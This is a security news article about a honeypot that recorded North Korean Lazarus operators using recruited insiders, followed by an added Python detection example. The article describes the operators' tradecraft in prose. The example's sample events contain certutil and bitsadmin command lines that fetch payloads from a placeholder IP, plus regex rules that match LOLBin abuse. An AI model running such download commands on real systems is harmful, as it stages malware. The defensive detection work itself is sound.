ANYRUN and NorthScan have exposed the inner workings of North Korea’s Lazarus Group through a bold honeypot operation.
Researchers captured live video of attackers using fake corporate laptops, revealing their full recruitment and attack pipeline.
This marks the first time Lazarus operators linked to the notorious Chollima subgroup were recorded mid-operation against Western targets.
The operation highlights how Lazarus blends social engineering with technical stealth, turning job offers into network breaches.
It started with a LinkedIn message from “Aaron,” alias “Blaze,” a known Lazarus recruiter.
He offered remote workers 35% of a full salary in exchange for “laptop access” to perform tasks, code for installing malware on, and exfiltrating data from, real companies.
Instead of declining, researchers working with Mauro Eldritch at BCA LTD supplied ANYRUN sandbox environments.
These virtual machines mimicked Windows and macOS workstations with realistic peripherals, network interfaces, and idle processes to evade detection.
Tools like ANYRUN’s behavioral analysis logged every keystroke, screenshot, and process spawn without alerting the attackers.
Over the course of months, “hired” operators logged in via RDP and VPN tunnels.
They ran custom PowerShell scripts for persistence, including obfuscated loaders that injected shellcode into legitimate processes such as explorer.exe.
Videos showed them scanning for endpoints with nmap equivalents and deploying Cobalt Strike beacons disguised as PDF readers.
The honeypot unveiled the complete Chollima attack cycle: reconnaissance, initial access via recruited insiders, lateral movement, and C2 staging.
Attackers used living-off-the-land binaries (LOLBins), such as certutil.exe for downloads and bitsadmin for staging payloads.
They targeted npm packages for supply chain footholds, echoing past attacks.
OPSEC was advanced: operators rotated user agents, chained proxies through bulletproof hosting in Russia and China, and checked for sandbox artifacts like low RAM or missing hardware sensors.
Despite this, the honeypots held, capturing malware samples with AES-encrypted configs pointing to Firebase C2 servers.
This marks a shift in Lazarus tradecraft from zero-day exploits to insider recruitment, bypassing perimeter firewalls through trusted VPN logins.
Defenders must vet job applicants in tech roles, scan for anomalous RDP from high-risk IPs, and deploy endpoint detection for LOLBins.
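The two detection controls named above, anomalous RDP sources and LOLBin abuse, can be expressed as simple rules over endpoint telemetry. The following is an added example, not code from ANYRUN, NorthScan or BCA LTD; the event records, host names, IPs and trusted ranges are all constructed for illustration, and real deployments would read Sysmon/EDR process-creation events and Windows logon events instead.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample telemetry (not from the report): process-creation records
# and RDP logon records normalised into dicts.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "user": "jdoe",
     "cmd": "certutil.exe -urlcache -split -f http://198.51.100.7/upd.bin C:\\Users\\Public\\upd.bin"},
    {"type": "process", "host": "ws01", "user": "jdoe",
     "cmd": "bitsadmin /transfer job1 http://198.51.100.7/stage.bin C:\\Users\\Public\\stage.bin"},
    {"type": "process", "host": "ws02", "user": "svc",
     "cmd": "certutil.exe -hashfile C:\\tmp\\a.exe SHA256"},   # benign certutil use
    {"type": "rdp_logon", "host": "ws01", "user": "jdoe", "src_ip": "203.0.113.45"},
    {"type": "rdp_logon", "host": "ws03", "user": "admin", "src_ip": "10.0.5.12"},
]

# Assumed corporate address space; anything outside it is an untrusted RDP source.
TRUSTED_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# LOLBin patterns for the two binaries the article names: certutil used as a
# downloader (-urlcache) and bitsadmin used to stage payloads (/transfer).
LOLBIN_RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\s+.*-urlcache\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(\.exe)?\s+/transfer\b", re.I)),
]

def detect(events):
    """Return (rule, host, user) alerts for LOLBin downloads and untrusted RDP logons."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            for name, pat in LOLBIN_RULES:
                if pat.search(ev["cmd"]):
                    alerts.append((name, ev["host"], ev["user"]))
        elif ev["type"] == "rdp_logon":
            src = ip_address(ev["src_ip"])
            if not any(src in net for net in TRUSTED_NETS):
                alerts.append(("rdp_untrusted_source", ev["host"], ev["user"]))
    return alerts

def correlate(alerts):
    """Escalate (host, user) pairs that show both an untrusted RDP logon and LOLBin
    staging: the sequence the honeypot recorded after a recruited insider logs in."""
    rdp = {(h, u) for r, h, u in alerts if r == "rdp_untrusted_source"}
    lol = {(h, u) for r, h, u in alerts if r != "rdp_untrusted_source"}
    return sorted(rdp & lol)

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    print(found)                # three alerts, all for ws01/jdoe except none for ws02
    print(correlate(found))     # [('ws01', 'jdoe')]
```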
Led by @0xfigo at NorthScan, the findings will be released with IOCs soon. Enterprises face a new reality: threats hide in HR inboxes.